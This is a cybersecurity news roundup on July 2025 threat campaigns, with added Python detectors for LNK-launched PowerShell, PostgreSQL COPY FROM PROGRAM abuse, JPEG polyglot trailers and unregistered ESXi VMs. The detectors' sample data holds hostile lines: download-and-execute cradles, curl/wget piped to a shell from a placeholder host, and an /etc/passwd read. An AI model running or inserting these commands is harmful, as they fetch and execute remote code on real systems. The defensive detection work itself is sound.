Category: Cybersecurity

  • Patchwork Targets Turkish Defense Firms with Spear-Phishing Using Malicious LNK Files

    Jul 25, 2025 | Ravie Lakshmanan | Malware / Threat Intelligence

    The threat actor known as Patchwork has been attributed to a new spear-phishing campaign targeting Turkish defense contractors with the goal of gathering strategic intelligence.

    “The campaign employs a five-stage execution chain delivered via malicious LNK files disguised as conference invitations sent to targets interested in learning more about unmanned vehicle systems,” Arctic Wolf Labs said in a technical report published this week.

    The activity, which also singled out an unnamed manufacturer of precision-guided missile systems, appears to be geopolitically motivated, as its timing coincides with deepening defense cooperation between Pakistan and Türkiye and the recent India-Pakistan military skirmishes.

    Patchwork, also called APT-C-09, APT-Q-36, Chinastrats, Dropping Elephant, Operation Hangover, Quilted Tiger, and Zinc Emerson, is assessed to be a state-sponsored actor of Indian origin. Known to be active since at least 2009, the hacking group has a track record of striking entities in China, Pakistan, and other countries in South Asia.

    Exactly a year ago, the Knownsec 404 Team documented Patchwork targeting entities with ties to Bhutan to deliver the Brute Ratel C4 framework and an updated version of a backdoor called PGoShell.

    Since the start of 2025, the threat actor has been linked to various campaigns aimed at Chinese universities, with recent attacks using baits related to power grids in the country to deliver a Rust-based loader that, in turn, decrypts and launches a C# trojan called Protego to harvest a wide range of information from compromised Windows systems.

    Another report published by Chinese cybersecurity firm QiAnXin back in May said it identified infrastructure overlaps between Patchwork and DoNot Team (aka APT-Q-38 or Bellyworm), suggesting potential operational connections between the two threat clusters.

    The targeting of Türkiye points to an expansion of the group's footprint, with malicious Windows shortcut (LNK) files distributed via phishing emails serving as the starting point for the multi-stage infection process.

    Specifically, the LNK file is designed to invoke PowerShell commands that are responsible for fetching additional payloads from an external server (“expouav[.]org”), a domain created on June 25, 2025, that hosts a PDF lure mimicking an international conference on unmanned vehicle systems, details of which are hosted on the legitimate waset[.]org website.

    “The PDF document serves as a visual decoy, designed to distract the user while the rest of the execution chain runs silently in the background,” Arctic Wolf said. “This targeting occurs as Türkiye commands 65% of the global UAV export market and develops critical hypersonic missile capabilities, while simultaneously strengthening defense ties with Pakistan during a period of heightened India-Pakistan tensions.”

    Among the downloaded artifacts is a malicious DLL that’s launched using DLL side-loading by means of a scheduled task, ultimately leading to the execution of shellcode that carries out extensive reconnaissance of the compromised host, including taking screenshots, and exfiltrating the details back to the server.
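
    The LNK-to-PowerShell stage described above (the same stage recurs in the CargoTalon and Hive0156 items further down this page) surfaces in endpoint telemetry as explorer.exe spawning a hidden PowerShell process whose command line fetches and runs remote content. The detection logic below is an added example, not Arctic Wolf's code: it scores constructed Sysmon Event ID 1-style records for download cradles, a hidden window, an execution-policy bypass, an explorer.exe parent, and an -EncodedCommand argument, which it decodes and scans as well. The sample events and the lure.example URLs are constructed placeholders, not indicators from the report.

```python
import base64
import binascii
import re

# Constructed process-creation records in Sysmon Event ID 1 shape (not real
# telemetry). URLs and file names are placeholders, not report indicators.
SAMPLE_EVENTS = [
    {   # LNK double-click: explorer.exe spawns a hidden PowerShell cradle
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": (r'powershell.exe -nop -w hidden -ep bypass -c '
                        r'"iwr https://lure.example/inv.pdf -OutFile $env:TEMP\inv.pdf;'
                        r' Start-Process $env:TEMP\inv.pdf"'),
    },
    {   # Same stage, script hidden behind -EncodedCommand (UTF-16LE base64)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -w hidden -enc " + base64.b64encode(
            "IEX (New-Object Net.WebClient).DownloadString('https://lure.example/s1.ps1')"
            .encode("utf-16le")).decode(),
    },
    {   # Benign: an admin runs a local script from the desktop
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -File C:\Users\ops\Desktop\inventory.ps1",
    },
    {   # Benign: scheduled task, hidden window but no network fetch
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CommandLine": r"powershell.exe -nop -w hidden -File C:\ProgramData\backup\rotate.ps1",
    },
]

POWERSHELL = re.compile(r"\\(?:powershell|pwsh)\.exe$", re.I)
CRADLE = re.compile(r"\b(?:invoke-webrequest|iwr|invoke-restmethod|irm|curl|wget|"
                    r"downloadstring|downloadfile|downloaddata|net\.webclient|"
                    r"start-bitstransfer)\b", re.I)
IN_MEMORY_EXEC = re.compile(r"\b(?:invoke-expression|iex)\b", re.I)
HIDDEN = re.compile(r"-w\w*\s+hidden", re.I)                     # -w / -win / -windowstyle hidden
BYPASS = re.compile(r"-e\w*\s+(?:bypass|unrestricted)", re.I)    # -ep / -exec / -executionpolicy
ENCODED = re.compile(r"(?:^|\s)-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Plaintext of an -EncodedCommand argument, or None if there is none / it is malformed."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except (binascii.Error, ValueError):
        return None


def score_event(ev):
    """Score one process-creation event; returns (score, reasons)."""
    if not POWERSHELL.search(ev.get("Image", "")):
        return 0, []
    cmd = ev.get("CommandLine", "")
    reasons = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded_command")
        cmd = cmd + " " + decoded          # scan the decoded script as well
    if CRADLE.search(cmd):
        reasons.append("download_cradle")
    if IN_MEMORY_EXEC.search(cmd):
        reasons.append("in_memory_exec")
    if HIDDEN.search(cmd):
        reasons.append("hidden_window")
    if BYPASS.search(cmd):
        reasons.append("execution_policy_bypass")
    if ev.get("ParentImage", "").lower().endswith(r"\explorer.exe"):
        reasons.append("launched_from_explorer")   # how a double-clicked LNK shows up
    weights = {"download_cradle": 2}               # everything else weighs 1
    return sum(weights.get(r, 1) for r in reasons), reasons


def detect(events, threshold=3):
    """Return [(index, score, reasons)] for events scoring at or above the threshold."""
    hits = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((i, score, reasons))
    return hits


if __name__ == "__main__":
    for i, score, reasons in detect(SAMPLE_EVENTS):
        print(f"event {i}: score {score}: {', '.join(reasons)}")
```

    The explorer.exe parent on its own is weak evidence (admins launch scripts from the desktop too), which is why it only adds one point; the cradle token is what carries the rule, and decoding -EncodedCommand before matching is what stops the obvious evasion. The scheduled-task DLL side-loading stage that follows is better caught with task-creation telemetry (Event ID 4698 or schtasks.exe command lines pointing at user-writable paths) than with this rule.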

    “This represents a significant evolution of this threat actor’s capabilities, transitioning from the x64 DLL variants observed in November 2024, to the current x86 PE executables with enhanced command structures,” the company said. “Dropping Elephant demonstrates continued operational investment and development through architectural diversification from x64 DLL to x86 PE formats, and enhanced C2 protocol implementation through impersonation of legitimate websites.”


    Source: thehackernews.com…

  • U.S. Sanctions Firm Behind N. Korean IT Scheme; Arizona Woman Jailed for Running Laptop Farm

    Jul 25, 2025 | Ravie Lakshmanan | Cybercrime / Insider Threat

    The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) sanctioned a North Korean front company and three associated individuals for their involvement in the fraudulent remote information technology (IT) worker scheme designed to generate illicit revenues for Pyongyang.

    The sanctions target Korea Sobaeksu Trading Company (aka Sobaeksu United Corporation), and Kim Se Un, Jo Kyong Hun, and Myong Chol Min for evading sanctions imposed by the U.S. and the United Nations against the Democratic People’s Republic of Korea (DPRK) government.

    “Our commitment is clear: Treasury, as part of a whole-of-government effort, will continue to hold accountable those who seek to infiltrate global supply chains and enable the sanctions evasion activities that further the Kim regime’s destabilizing agenda,” said Director of OFAC Bradley T. Smith.

    The latest action continues the U.S. government's efforts to dismantle the wide-ranging revenue-generation schemes North Korea uses to fund its illegal nuclear and ballistic missile programs.

    The IT worker scheme, which has grown into a global threat, involves the DPRK regime dispatching highly skilled IT workers to locations such as China, Russia, and Vietnam to obtain remote jobs at U.S. and other companies using a combination of fraudulent documents, stolen identities, and false personas, often with help from facilitators who run laptop farms.

    In what has been described as a recurring, if “baffling,” theme, many of these fake workers have been found to use Minions and other Despicable Me characters in social-media profiles and email addresses.

    “The DPRK government withholds most of the wages earned by IT workers, generating hundreds of millions of dollars in revenue to support the North Korean regime’s unlawful weapons of mass destruction and ballistic missile programs,” the Treasury said. “In some cases, these DPRK IT workers have introduced malware into company networks to exfiltrate proprietary and sensitive data.”

    The development comes merely weeks after OFAC sanctioned Song Kum Hyok, a 38-year-old member of a North Korean hacking group called Andariel, for his role in the IT worker scheme.

    In related news, Christina Marie Chapman, 50, of Arizona, was sentenced to 8.5 years in prison for running a laptop farm for IT workers to give the impression that they were working remotely within the U.S. when, in reality, they were logging into those machines remotely. Chapman pleaded guilty earlier this February.

    The impacted companies included a top-five major television network, a Silicon Valley technology company, an aerospace manufacturer, an American car maker, a luxury retail store, and a U.S. media and entertainment company. The IT workers also unsuccessfully attempted to land jobs at two different U.S. government agencies.

    The U.S. Federal Bureau of Investigation (FBI) seized more than 90 laptops from Chapman’s home during an October 2023 raid. Chapman is also said to have 49 laptops at locations overseas, including multiple shipments to a Chinese city on the North Korean border.

    In all, the elaborate counterfeit operation netted more than $17 million in illicit revenue for Chapman and North Korea from October 2020 to October 2023. Chapman has also been ordered to serve three years of supervised release, to forfeit $284,556 that was to be paid to the North Koreans, and to pay a judgment of $176,850.

    “Christina Chapman perpetrated a years’ long scheme that resulted in millions of dollars raised for the DPRK regime, exploited more than 300 American companies and government agencies, and stole dozens of identities of American citizens,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.


    Source: thehackernews.com…

  • Cyber Espionage Campaign Hits Russian Aerospace Sector Using EAGLET Backdoor

    Jul 25, 2025 | Ravie Lakshmanan | Cyber Espionage / Malware

    Russian aerospace and defense industries have become the target of a cyber espionage campaign that delivers a backdoor called EAGLET to facilitate data exfiltration.

    The activity, dubbed Operation CargoTalon, has been assigned to a threat cluster tracked as UNG0901 (short for Unknown Group 901).

    “The campaign is aimed at targeting employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia, by using товарно-транспортная накладная (TTN, consignment note) documents — critical to Russian logistics operations,” Seqrite Labs researcher Subhajeet Singha said in an analysis published this week.

    The attack commences with a spear-phishing email bearing cargo delivery-themed lures that contain a ZIP archive, within which is a Windows shortcut (LNK) file that uses PowerShell to display a decoy Microsoft Excel document, while also deploying the EAGLET DLL implant on the host.

    The decoy document, per Seqrite, references Obltransterminal, a Russian railway container terminal operator that was sanctioned by the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) in February 2024.

    EAGLET is designed to gather system information and establish a connection to a hard-coded remote server (“185.225.17[.]104”) in order to process the HTTP response from the server and extract the commands to be executed on the compromised Windows machine.

    The implant supports shell access and the ability to upload/download files, although the exact nature of the next-stage payloads delivered through this method is unknown, given that the command-and-control (C2) server is currently offline.

    Seqrite said it also uncovered similar campaigns targeting the Russian military sector with EAGLET, not to mention source code and targeting overlaps with another threat cluster tracked as Head Mare that’s known to target Russian entities.

    This includes the functional parallels between EAGLET and PhantomDL, a Go-based backdoor with a shell and file download/upload feature, as well as the similarities in the naming scheme used for the phishing message attachments.

    The disclosure comes as the Russian state-sponsored hacking group called UAC-0184 (aka Hive0156) has been attributed to a fresh attack wave targeting victims in Ukraine with Remcos RAT as recently as this month.

    While the threat actor has a history of delivering Remcos RAT since early 2024, newly spotted attack chains distributing the malware have been simplified, employing weaponized LNK or PowerShell files to retrieve the decoy file and the Hijack Loader (aka IDAT Loader) payload, which then launches Remcos RAT.

    “Hive0156 delivers weaponized Microsoft LNK and PowerShell files, leading to the download and execution of Remcos RAT,” IBM X-Force said, adding it “observed key decoy documents featuring themes that suggest a focus on the Ukrainian military and evolving to a potential wider audience.”


    Source: thehackernews.com…

  • Soco404 and Koske Malware Target Cloud Services with Cross-Platform Cryptomining Attacks

    Jul 25, 2025 | Ravie Lakshmanan | Malware / Cloud Security

    Threat hunters have disclosed two different malware campaigns that have targeted vulnerabilities and misconfigurations across cloud environments to deliver cryptocurrency miners.

    The threat activity clusters have been codenamed Soco404 and Koske by cloud security firms Wiz and Aqua, respectively.

    Soco404 “targets both Linux and Windows systems, deploying platform-specific malware,” Wiz researchers Maor Dokhanian, Shahar Dorfman, and Avigayil Mechtinger said. “They use process masquerading to disguise malicious activity as legitimate system processes.”

    The Soco404 name refers to the fact that payloads are embedded in fake 404 HTML pages hosted on websites built with Google Sites. The bogus sites have since been taken down by Google.

    Wiz posited that the campaign, which has been previously observed going after Apache Tomcat services with weak credentials, as well as susceptible Apache Struts and Atlassian Confluence servers using the Sysrv botnet, is part of a broader crypto-scam infrastructure, including fraudulent cryptocurrency trading platforms.

    The latest campaign has also been found to target publicly accessible PostgreSQL instances, with the attackers abusing compromised Apache Tomcat servers to host payloads tailored for both Linux and Windows environments. The attackers also compromised a legitimate Korean transportation website and used it for malware delivery.

    Once initial access is obtained, PostgreSQL's COPY ... FROM PROGRAM SQL command is abused to run arbitrary shell commands on the host and achieve remote code execution. This is a documented feature rather than a vulnerability: it is available to superusers and to members of the pg_execute_server_program role, so an internet-reachable database with weak or default superuser credentials is effectively an open shell.
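
    As an added example (not Wiz's code), the following scans PostgreSQL statement logs for the COPY ... FROM PROGRAM primitive and for server-side file access functions, normalising comments, whitespace and case first so that obfuscated variants such as copy/**/t from program are still caught. The log lines, the 198.51.100.7 address and the commands are constructed placeholders; the line format assumes log_statement = 'all' with the default log_line_prefix, and multi-line statements are not reassembled here.

```python
import re

# Constructed PostgreSQL log lines (log_statement = 'all', default
# log_line_prefix '%m [%p] %u@%d '). Commands and the 198.51.100.7 address
# are placeholders, not indicators from the Wiz report.
SAMPLE_LOG = """\
2025-07-20 03:14:07.512 UTC [2211] postgres@postgres LOG:  statement: COPY cmd_out FROM PROGRAM 'curl -s http://198.51.100.7/x.sh | sh'
2025-07-20 03:14:09.001 UTC [2211] postgres@postgres LOG:  statement: copy/**/t from program $$wget -qO- http://198.51.100.7/x.sh|bash$$
2025-07-20 03:15:00.220 UTC [2302] app@shop LOG:  statement: COPY orders FROM '/var/lib/postgresql/import/orders.csv' CSV
2025-07-20 03:15:01.000 UTC [2302] app@shop LOG:  statement: COPY (SELECT * FROM orders) TO STDOUT
2025-07-20 03:16:11.400 UTC [2330] postgres@postgres LOG:  statement: SELECT pg_read_file('/etc/passwd')
"""

LINE = re.compile(r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] (?P<user>[^@\s]+)@(?P<db>\S+) "
                  r"LOG:\s+statement: (?P<sql>.*)$")
# COPY ... FROM|TO PROGRAM with the command in a quoted or dollar-quoted string
COPY_PROGRAM = re.compile(r"\bcopy\b.*?\b(?:from|to)\s+program\s+"
                          r"(?:'(?P<q>(?:[^']|'')*)'|\$\$(?P<d>.*?)\$\$)", re.I | re.S)
# Lower-severity: reading or listing files on the database host
SERVER_FILE = re.compile(r"\b(?:pg_read_file|pg_read_binary_file|pg_ls_dir|lo_import|lo_export)\s*\(", re.I)


def normalize(sql):
    """Strip SQL comments and fold whitespace so 'copy/**/t  FROM  program' still matches.
    Case is left alone so the extracted command stays verbatim; matching uses re.I."""
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)
    sql = re.sub(r"--[^\n]*", " ", sql)
    return re.sub(r"\s+", " ", sql).strip()


def scan_log(text):
    """Findings for statements that reach the OS or filesystem through PostgreSQL."""
    findings = []
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue        # continuation lines of multi-line statements are not handled here
        sql = normalize(m.group("sql"))
        base = {"pid": int(m.group("pid")), "user": m.group("user"), "db": m.group("db")}
        cp = COPY_PROGRAM.search(sql)
        if cp:
            program = cp.group("q").replace("''", "'") if cp.group("q") is not None else cp.group("d")
            findings.append({**base, "technique": "copy_program", "program": program.strip()})
        elif SERVER_FILE.search(sql):
            findings.append({**base, "technique": "server_file_access", "program": None})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"pid {f['pid']} {f['user']}@{f['db']}: {f['technique']} {f['program'] or ''}")
```

    Detection is the fallback, not the fix. COPY ... FROM PROGRAM is only available to superusers and to members of pg_execute_server_program, so application roles should never be superusers and that role membership should be revoked where it was granted; combined with keeping port 5432 off the internet, this removes the primitive the Soco404 operators depend on.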

    “The attacker behind Soco404 appears to be conducting automated scans for exposed services, aiming to exploit any accessible entry point,” Wiz said. “Their use of a wide range of ingress tools, including Linux utilities like wget and curl, as well as Windows-native tools such as certutil and PowerShell, highlights an opportunistic strategy.”

    On Linux systems, a dropper shell script is executed directly in memory to download and launch a next-stage payload, while simultaneously taking steps to terminate competing miners to maximize financial gain and limit forensic visibility by overwriting logs associated with cron and wtmp.

    The payload executed in the next-stage is a binary that serves as a loader for the miner by contacting an external domain (“www.fastsoco[.]top”) that’s based on Google Sites.

    The attack chain for Windows leverages the initial post-exploitation command to download and execute a Windows binary, which, like its Linux counterpart, functions as a loader that embeds both the miner and the WinRing0.sys driver, the latter being used to obtain NT\SYSTEM privileges.

    On top of that, the malware attempts to stop the Windows event log service and executes a self-deletion command to evade detection.

    “Rather than relying on a single method or operating system, the attacker casts a wide net, deploying whichever tool or technique is available in the environment to deliver their payload,” the company said. “This flexible approach is characteristic of a broad, automated cryptomining campaign focused on maximizing reach and persistence across varied targets.”

    The discovery of Soco404 dovetails with the emergence of a new Linux threat dubbed Koske that’s suspected to be developed with assistance from a large language model (LLM) and uses seemingly innocuous images of pandas to propagate the malware.

    The attack starts with the exploitation of a misconfigured server, such as an exposed JupyterLab instance, to retrieve two JPEG images from which various scripts are extracted, including a C-based rootkit that hides malware-related files via LD_PRELOAD and a shell script that ultimately downloads cryptocurrency miners onto the infected system. Both payloads are executed directly in memory to avoid leaving traces on disk.

    Koske’s end goal is to deploy CPU and GPU-optimized cryptocurrency miners that take advantage of the host’s computational resources to mine 18 distinct coins, such as Monero, Ravencoin, Zano, Nexa, and Tari, among others.

    “These images are polyglot files, with malicious payloads appended to the end. Once downloaded, the malware extracts and executes the malicious segments in memory, bypassing antivirus tools,” Aqua researcher Assaf Morag said.

    “This technique isn’t steganography but rather polyglot file abuse or malicious file embedding. This technique uses a valid JPG file with malicious shellcode hidden at the end. Only the last bytes are downloaded and executed, making it a sneaky form of polyglot abuse.”
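
    As an added example (not Aqua's code), the following walks the JPEG marker structure to find the End-Of-Image marker and returns whatever is appended after it, which is exactly the polyglot layout described above. The image skeleton and the appended shell script are constructed placeholders; the skeleton carries real markers for the walker but is not a viewable picture.

```python
def find_jpeg_end(data: bytes):
    """Walk the JPEG segment chain and return the offset just past the EOI
    marker (FF D9), or None if the bytes are not a well-formed JPEG."""
    if data[:2] != b"\xff\xd8":                      # SOI
        return None
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            return None
        marker = data[pos + 1]
        if marker == 0xFF:                           # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:                           # EOI: the image ends here
            return pos + 2
        if marker == 0x01 or 0xD0 <= marker <= 0xD7:  # TEM / RSTn carry no length field
            pos += 2
            continue
        if pos + 4 > len(data):
            return None
        length = int.from_bytes(data[pos + 2:pos + 4], "big")   # includes its own 2 bytes
        if length < 2:
            return None
        pos += 2 + length
        if marker == 0xDA:                           # SOS: entropy-coded data follows
            # Inside scan data 0xFF is escaped as FF 00 and RSTn (FF D0..D7) may
            # appear; any other byte after 0xFF starts the next real marker.
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    return None


def trailing_data(data: bytes):
    """Bytes appended after EOI: b'' for a clean image, None if not a JPEG."""
    end = find_jpeg_end(data)
    return None if end is None else data[end:]


def looks_like_script(tail: bytes) -> bool:
    """Cheap triage for an appended trailer: a shebang or mostly printable text."""
    if tail.startswith(b"#!"):
        return True
    sample = tail[:512]
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in sample)
    return len(sample) > 16 and printable / len(sample) > 0.95


def _minimal_jpeg() -> bytes:
    """Constructed JPEG skeleton: SOI, APP0/JFIF, SOS, scan data containing an
    escaped FF and an RST0, then EOI. Structurally valid, not a decodable image."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"   # 14-byte JFIF payload
    sos = b"\x01\x01\x00\x00\x3f\x00"                        # one component
    scan = b"\x12\x34\xff\x00\x56\xff\xd0\x78\x9a"
    return (b"\xff\xd8"
            + b"\xff\xe0" + (len(app0) + 2).to_bytes(2, "big") + app0
            + b"\xff\xda" + (len(sos) + 2).to_bytes(2, "big") + sos
            + scan + b"\xff\xd9")


CLEAN_IMAGE = _minimal_jpeg()
# Constructed placeholder payload; 198.51.100.7 is a documentation address.
PAYLOAD = b"#!/bin/bash\ncurl -s http://198.51.100.7/m.sh | bash\n"
POLYGLOT = CLEAN_IMAGE + PAYLOAD

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_IMAGE), ("polyglot", POLYGLOT)):
        tail = trailing_data(blob)
        print(f"{label}: {len(tail)} trailing bytes, script-like={looks_like_script(tail)}")
```

    A non-empty trailer is not proof of malice on its own, since some cameras and editors append metadata after EOI; a trailer that starts with a shebang or is almost entirely printable text, as looks_like_script checks, is the signal worth alerting on. Aqua's observation that only the last bytes are downloaded is consistent with a partial (ranged) fetch of the image URL, so image requests with Range headers from hosts that should not be fetching images are a complementary network-side check.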


    Source: thehackernews.com…

  • Overcoming Risks from Chinese GenAI Tool Usage

    Jul 25, 2025 | The Hacker News | Artificial Intelligence / Data Privacy

    A recent analysis of enterprise data suggests that generative AI tools developed in China are being used extensively by employees in the US and UK, often without oversight or approval from security teams. The study, conducted by Harmonic Security, also identifies hundreds of instances in which sensitive data was uploaded to platforms hosted in China, raising concerns over compliance, data residency, and commercial confidentiality.

    Over a 30-day period, Harmonic examined the activity of a sample of 14,000 employees across a range of companies. Nearly 8 percent were found to have used China-based GenAI tools, including DeepSeek, Kimi Moonshot, Baidu Chat, Qwen (from Alibaba), and Manus. These applications, while powerful and easy to access, typically provide little information on how uploaded data is handled, stored, or reused.

    The findings underline a widening gap between AI adoption and governance, especially in developer-heavy organizations where time-to-output often trumps policy compliance.

    If you’re looking for a way to enforce your AI usage policy with granular controls, contact Harmonic Security.

    Data Leakage at Scale

    In total, over 17 megabytes of content were uploaded to these platforms by 1,059 users. Harmonic identified 535 separate incidents involving sensitive information. Nearly one-third of that material consisted of source code or engineering documentation. The remainder included documents related to mergers and acquisitions, financial reports, personally identifiable information, legal contracts, and customer records.

    Harmonic’s study singled out DeepSeek as the most prevalent tool, associated with 85 percent of recorded incidents. Kimi Moonshot and Qwen are also seeing uptake. Collectively, these services are reshaping how GenAI appears inside corporate networks. It’s not through sanctioned platforms, but through quiet, user-led adoption.

    Chinese GenAI services frequently operate under permissive or opaque data policies. In some cases, platform terms allow uploaded content to be used for further model training. The implications are substantial for firms operating in regulated sectors or handling proprietary software and internal business plans.

    Policy Enforcement Through Technical Controls

    Harmonic Security has developed tools to help enterprises regain control over how GenAI is used in the workplace. Its platform monitors AI activity in real time and enforces policy at the moment of use.

    Companies have granular controls to block access to certain applications based on their HQ location, restrict specific types of data from being uploaded, and educate users through contextual prompts.

    Governance as a Strategic Imperative

    The rise of unauthorized GenAI use inside enterprises is no longer hypothetical. Harmonic’s data show that nearly one in twelve employees is already interacting with Chinese GenAI platforms, often with no awareness of data retention risks or jurisdictional exposure.

    The findings suggest that awareness alone is insufficient. Firms will require active, enforced controls if they are to enable GenAI adoption without compromising compliance or security. As the technology matures, the ability to govern its use may prove just as consequential as the performance of the models themselves.

    Harmonic makes it possible to embrace the benefits of GenAI without exposing your business to unnecessary risk.

    Learn more about how Harmonic helps enforce AI policies and protect sensitive data at harmonic.security.


    Source: thehackernews.com…

  • Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments

    Jul 24, 2025 | Ravie Lakshmanan | Virtualization / Network Security

    Virtualization and networking infrastructure have been targeted by a threat actor codenamed Fire Ant as part of a prolonged cyber espionage campaign.

    The activity, observed this year, is primarily designed to infiltrate organizations' VMware ESXi and vCenter environments as well as network appliances, Sygnia said in a new report published today.

    “The threat actor leveraged combinations of sophisticated and stealthy techniques, creating multilayered attack kill chains to facilitate access to restricted and segmented network assets within environments presumed to be isolated,” the cybersecurity company said.

    “The attacker demonstrated a high degree of persistence and operational maneuverability, operating through eradication efforts, adapting in real time to eradication and containment actions to maintain access to the compromised infrastructure.”

    Fire Ant is assessed to share tooling and targeting overlaps with prior campaigns orchestrated by UNC3886, a China-nexus cyber espionage group known for its persistent targeting of edge devices and virtualization technologies since at least 2022.

    Attacks mounted by the threat actor have been found to establish entrenched control of VMware ESXi hosts and vCenter servers, demonstrating advanced capabilities to pivot into guest environments and bypass network segmentation by compromising network appliances.

    Another noteworthy aspect is the ability of the threat actor to maintain operational resilience by adapting to containment efforts, switching to different tools, dropping fallback backdoors for persistence, and altering network configurations to re-establish access to compromised networks.

    Fire Ant’s breach of the virtualization management layer is achieved by exploiting CVE-2023-34048, a known security flaw in VMware vCenter Server that UNC3886 exploited as a zero-day for roughly two years before it was patched in October 2023.

    “From vCenter, they extracted the ‘vpxuser’ service account credentials and used them to access connected ESXi hosts,” Sygnia noted. “They deployed multiple persistent backdoors on both ESXi hosts and the vCenter to maintain access across reboots. The backdoor filename, hash and deployment technique aligned with the VIRTUALPITA malware family.”

    Also dropped is a Python-based implant (“autobackup.bin”) that provides remote command execution, and file download and upload capabilities. It runs in the background as a daemon.

    Upon gaining access to the hypervisor, the attackers are said to have leveraged another flaw, this one in VMware Tools (CVE-2023-20867), to interact directly with guest virtual machines via PowerCLI, to interfere with the functioning of security tools, and to extract credentials from memory snapshots, including those of domain controllers.

    Some of the other crucial aspects of the threat actor’s tradecraft are as follows –

    • Dropping the V2Ray framework to facilitate guest network tunneling
    • Deploying unregistered virtual machines directly on multiple ESXi hosts
    • Breaking down network segmentation barriers and establishing cross-segment persistence
    • Resisting incident response and remediation efforts by re-compromising assets and, in some cases, blending in by renaming payloads to impersonate forensic tools
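
    The second bullet, unregistered VMs running directly on ESXi hosts, can be hunted by comparing what the host inventory lists against what the VMX processes are actually running: a VM that is running but not registered will not appear in vCenter or in vim-cmd vmsvc/getallvms. The following is an added example, not Sygnia's code. It parses constructed output in the shape of vim-cmd vmsvc/getallvms and esxcli vm process list (both formats are assumed here, and the sample values are made up) and compares datastore-relative .vmx paths, because the inventory shows the datastore label while the process list may show the volume UUID.

```python
import re

# Constructed command output (not from the Sygnia report). Formats follow
# `vim-cmd vmsvc/getallvms` and `esxcli vm process list` as assumed here;
# names, IDs and the volume UUID are placeholders.
INVENTORY = """\
Vmid   Name    File                              Guest OS                      Version   Annotation
1      dc01    [datastore1] dc01/dc01.vmx        windows2019srvNext_64Guest    vmx-19
2      web01   [datastore1] web01/web01.vmx      ubuntu64Guest                 vmx-19
"""

PROCESSES = """\
dc01
   World ID: 2100101
   Process ID: 0
   VMX Cartel ID: 2100100
   Display Name: dc01
   Config File: /vmfs/volumes/6512a9f0-1c2b3d4e-5f60-0050569a1b2c/dc01/dc01.vmx

web01
   World ID: 2100231
   Process ID: 0
   VMX Cartel ID: 2100230
   Display Name: web01
   Config File: /vmfs/volumes/6512a9f0-1c2b3d4e-5f60-0050569a1b2c/web01/web01.vmx

svc
   World ID: 2104877
   Process ID: 0
   VMX Cartel ID: 2104876
   Display Name: svc
   Config File: /vmfs/volumes/6512a9f0-1c2b3d4e-5f60-0050569a1b2c/.svc/svc.vmx
"""

# Inventory rows: "<Vmid> <Name> [<datastore>] <relative path>.vmx <Guest OS> ..."
INV_ROW = re.compile(r"^[ \t]*\d+\s+\S+\s+\[(?P<ds>[^\]]+)\]\s+(?P<rel>.+?\.vmx)(?=\s|$)", re.M)
VOLUME_PATH = re.compile(r"^/vmfs/volumes/[^/]+/(?P<rel>.+\.vmx)$")


def datastore_relative(config_path):
    """'/vmfs/volumes/<label-or-uuid>/dir/vm.vmx' -> 'dir/vm.vmx'."""
    m = VOLUME_PATH.match(config_path.strip())
    return m.group("rel") if m else config_path.strip()


def parse_inventory(text):
    """Datastore-relative .vmx paths of every VM registered with the host."""
    return {m.group("rel").strip() for m in INV_ROW.finditer(text)}


def parse_running(text):
    """[(display_name, config_path)] for every VMX process on the host."""
    running = []
    for block in re.split(r"\n\s*\n", text.strip()):
        name = re.search(r"Display Name:\s*(.+)", block)
        cfg = re.search(r"Config File:\s*(.+)", block)
        if name and cfg:
            running.append((name.group(1).strip(), cfg.group(1).strip()))
    return running


def find_unregistered(inventory_text, process_text):
    """Running VMs whose .vmx is not in the registered inventory."""
    registered = parse_inventory(inventory_text)
    return [(name, cfg) for name, cfg in parse_running(process_text)
            if datastore_relative(cfg) not in registered]


if __name__ == "__main__":
    for name, cfg in find_unregistered(INVENTORY, PROCESSES):
        print(f"running but unregistered: {name} ({cfg})")
```

    Run it against output collected from each host, not from vCenter alone, since an attacker who controls the host can keep the VM out of the inventory entirely. The same comparison against a datastore listing of *.vmx files catches the quieter case of a staged VM that is registered nowhere and not yet powered on.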

    The attack chain ultimately opened up a pathway for Fire Ant to maintain persistent, covert access from the hypervisor to guest operating systems. Sygnia also described the adversary as possessing a “deep understanding” of the target environment’s network architecture and policies in order to reach otherwise isolated assets.

    Fire Ant is unusually focused on remaining undetected and leaves a minimal intrusion footprint. This is evidenced in the steps taken by the attackers to tamper with logging on ESXi hosts by terminating the “vmsyslogd” process, effectively suppressing an audit trail and limiting forensic visibility.

